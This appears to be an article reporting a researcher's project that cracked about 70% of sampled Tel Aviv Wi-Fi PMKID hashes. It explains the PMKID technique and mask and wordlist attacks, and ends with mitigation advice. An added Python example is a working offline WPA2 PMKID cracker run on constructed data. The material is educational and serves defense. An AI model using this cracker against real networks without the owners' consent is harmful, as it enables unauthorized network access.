Expert Hacks 70% of Tel Aviv Wi-Fi Networks for Research

CyberArk researcher Ido Hoorvitch cracked the passwords of roughly 70% of a sample of Wi-Fi networks in his hometown of Tel Aviv, as part of a research project meant to show how poorly protected home networks are and how cheaply they can be compromised.

For his experiment, Hoorvitch walked around the city with sniffing equipment and collected 5,000 network hashes. Rather than waiting for clients to authenticate, he used a technique that recovers the PMKID, a value the access point includes in the first message of the WPA2 handshake and that exists mainly to support roaming (PMK caching). The PMKID is a truncated HMAC-SHA1 keyed with the PMK, which is itself derived from the passphrase and SSID with PBKDF2; the HMAC input is the fixed string "PMK Name" followed by the AP and client MAC addresses. Everything except the passphrase is therefore either public or captured over the air, which is what makes offline guessing possible.

To obtain the PMKID hashes, he used a roughly $50 ALFA AWUS036ACH network card, which supports both monitor mode and packet injection, and analyzed the captures with Wireshark on Ubuntu.

Using a method developed by Jens “atom” Steube (the lead developer of Hashcat), Hoorvitch collected PMKIDs, which were then cracked to reveal passwords. “Atom’s method does not require a client, so there’s no need to capture a user’s login in real time or wait for users to connect to the network,” Hoorvitch explained. “Moreover, an attacker only needs to capture a single frame and can filter out incorrect passwords and corrupted frames that interfere with the cracking process.”

Hoorvitch started with a mask attack to identify people who use their mobile phone number as their Wi-Fi password, a common practice in Israel. Israeli mobile numbers are ten digits long and always start with 05, so the mask only has to enumerate the remaining eight digits: 10^8 candidates, a trivial keyspace compared with the 4096-iteration PBKDF2 derivation that each guess costs.

Using a regular laptop and this technique, the researcher cracked 2,200 passwords at an average rate of nine minutes per password. In the next phase, he switched to a dictionary attack using rockyou.txt, which quickly cracked another 1,359 passwords, most of which consisted only of lowercase letters.
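The two ideas above, the PMKID construction and the mask-then-wordlist attack against it, are small enough to show end to end. The block below is an added example written for this page, not code from Hoorvitch's research or from hashcat: it reimplements the standard WPA2-PSK derivations (PBKDF2-HMAC-SHA1 for the PMK, truncated HMAC-SHA1 over "PMK Name" and the two MAC addresses for the PMKID), parses a record in hashcat's 16800 layout (`PMKID*MAC_AP*MAC_STA*ESSID_HEX`), and runs a minimal hashcat-style mask expander and a wordlist against it. The MAC addresses, SSID, passphrases and wordlist are constructed for the demo; the full Israeli phone-number mask is `05?d?d?d?d?d?d?d?d` (10^8 candidates), which the demo narrows to a few fixed digits so it finishes in about a second in pure Python. Capture is out of scope; no Wi-Fi hardware is needed to run it.

```python
"""Added example (not from the original article): WPA2 PMKID derivation
and a toy offline cracker using a mask and a wordlist."""
import hashlib
import hmac
import itertools
from typing import Iterable, Iterator, Optional, Tuple


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This is the only slow step and the only input the attacker does not have.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC).
    # "PMK Name" is the fixed string; the MACs are visible on the air.
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Parse one hashcat -m 16800 record: PMKID*MAC_AP*MAC_STA*ESSID_HEX."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return (bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex),
            bytes.fromhex(sta_hex), bytes.fromhex(essid_hex).decode())


def expand_mask(mask: str) -> Iterator[str]:
    """Minimal hashcat-style mask: '?d' = digit, '?l' = lowercase, else literal."""
    charsets = {"d": "0123456789", "l": "abcdefghijklmnopqrstuvwxyz"}
    parts = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in charsets:
            parts.append(charsets[mask[i + 1]])
            i += 2
        else:
            parts.append(mask[i])  # literal character
            i += 1
    for combo in itertools.product(*parts):
        yield "".join(combo)


def crack_pmkid(record: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose derived PMKID matches the record, else None."""
    pmkid, mac_ap, mac_sta, ssid = parse_16800(record)
    for guess in candidates:
        if len(guess) < 8:  # WPA2 passphrases are 8..63 characters; skip impossible guesses
            continue
        if derive_pmkid(derive_pmk(guess, ssid), mac_ap, mac_sta) == pmkid:
            return guess
    return None


def make_record(passphrase: str, ssid: str, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build a 16800-style record for a network we control (stands in for a capture)."""
    pmkid = derive_pmkid(derive_pmk(passphrase, ssid), mac_ap, mac_sta)
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex()])


# Constructed sample data; not a real network.
SAMPLE_AP = bytes.fromhex("001122334455")
SAMPLE_STA = bytes.fromhex("66778899aabb")
SAMPLE_SSID = "HomeNet"
SAMPLE_RECORD = make_record("0541234567", SAMPLE_SSID, SAMPLE_AP, SAMPLE_STA)

# Full Israeli mobile-number mask would be "05?d?d?d?d?d?d?d?d" (1e8 guesses);
# the demo fixes the first digits so it runs in about a second.
DEMO_MASK = "0541234?d?d?d"
SMALL_WORDLIST = ["password", "qwerty123", "sunshine", "iloveyou"]  # constructed

if __name__ == "__main__":
    print("mask attack   :", crack_pmkid(SAMPLE_RECORD, expand_mask(DEMO_MASK)))
    print("wordlist      :", crack_pmkid(SAMPLE_RECORD, SMALL_WORDLIST))
```

The test vector worth keeping at hand is the one from the 802.11i standard: passphrase `password` with SSID `IEEE` must give a PMK starting `f42c6fc52df0ebef...`; if `derive_pmk` does not reproduce it, nothing downstream can be trusted. Note also that the same `derive_pmk` cost applies whether the attacker holds a PMKID or a full four-way handshake; the PMKID route only removes the need for a client to be present.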

In total, Hoorvitch recovered 3,559 of the 5,000 sampled passwords, about 70%, confirming his suspicion that home Wi-Fi networks are poorly protected.

The expert concludes that users should not enable roaming features on routers intended for personal use (WPA2-Personal), since a single-AP home network has no need for them. He also notes that passwords longer than 10 characters are far more resistant to cracking. Disabling roaming is only a partial mitigation, though: an attacker who captures an ordinary four-way handshake instead of a PMKID can run exactly the same offline guessing, so the decisive factor is a long, random passphrase rather than a phone number or a dictionary word.
